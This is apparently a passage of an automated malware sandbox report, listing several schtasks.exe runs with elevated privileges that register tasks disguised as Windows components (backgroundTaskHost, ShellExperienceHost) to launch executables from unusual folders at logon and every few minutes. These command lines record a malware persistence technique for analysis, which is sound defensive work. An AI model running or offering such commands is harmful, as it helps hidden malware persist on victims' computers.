                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:36
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:37
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:38
                            Start time:00:52:25
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:40
                            Start time:00:52:26
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            No disassembly